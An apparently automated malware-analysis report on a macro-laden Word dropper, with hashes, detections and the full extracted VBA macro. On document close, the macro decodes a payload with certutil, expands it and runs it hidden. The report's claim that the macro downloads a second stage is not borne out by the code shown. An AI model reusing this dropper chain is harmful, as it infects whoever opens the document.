Office (OOXML) malware analysis — malicious · 5788b5a50cf8057f

MALICIOUS

Office (OOXML)

987.8 KB Created: 2018-01-29 09:41:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2019-04-18

MD5: fefaa0df12195fc3d90d9393ad3a7840 SHA-1: f02bc89118e480efc963093ab6ed8d1fed3af521 SHA-256: 5788b5a50cf8057f138a585221bb55498987a3510fe4e60b38aaa803bddbe1e9

330 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File T1140 Deobfuscate or Obfuscate

The VBA macro within this document utilizes WScript.Shell to execute a series of commands. It first writes obfuscated content to a temporary file, then uses certutil to decode it, expands the resulting archive, and finally executes 'VizorHtmlDialog.exe'. This sequence strongly suggests the document is a dropper designed to download and execute a second-stage payload.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6444387-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6444387-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

DGHjIKbFRghjH.Close
Set uVFTyuiVGT = CreateObject("Wscript.Shell")
uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

Set uVFTyuiVGT = CreateObject("Wscript.Shell")
uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True
uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set crHJUgVD = ActiveDocument.Range(1, IbRuVFdU)
Set jIHiuHY = CreateObject("Scripting.FileSystemObject")
Set DGHjIKbFRghjH = jIHiuHY.CreateTextFile(HYFRTghYcU, True)

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

Set uVFTyuiVGT = CreateObject("Wscript.Shell")
uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True
uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Dim HYFRTghYcU As String
HYFRTghYcU = Environ("temp") & "\HfRYgyugy"
IbRuVFdU = ActiveDocument.Content.End
```
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1173 bytes
SHA-256: `9f95f200e7e05adfe6ecfa1795314ee053ac4f4ee6d4fc9da7c4440836c45304`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() Dim IbRuVFdU As Long Dim HYFRTghYcU As String HYFRTghYcU = Environ("temp") & "\HfRYgyugy" IbRuVFdU = ActiveDocument.Content.End Set crHJUgVD = ActiveDocument.Range(1, IbRuVFdU) Set jIHiuHY = CreateObject("Scripting.FileSystemObject") Set DGHjIKbFRghjH = jIHiuHY.CreateTextFile(HYFRTghYcU, True) DGHjIKbFRghjH.WriteLine (crHJUgVD) DGHjIKbFRghjH.Close Set uVFTyuiVGT = CreateObject("Wscript.Shell") uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True uVFTyuiVGT.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False Set uVFTyuiVGT = Nothing Set jIHiuHY = Nothing End Sub Private Sub Document_New() End Sub Attribute VB_Name = "NewMacros" Sub BYcuYIUGBTCFYGUGIKH() ' ' BYcuYIUGBTCFYGUGIKH Macro ' ' End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	12800 bytes
SHA-256: `6cf527cc047be369117b6ba1634dbd02e311f8ae2b654026d27afcda2854d346`

Open this report in the interactive analyzer, or submit your own file for analysis.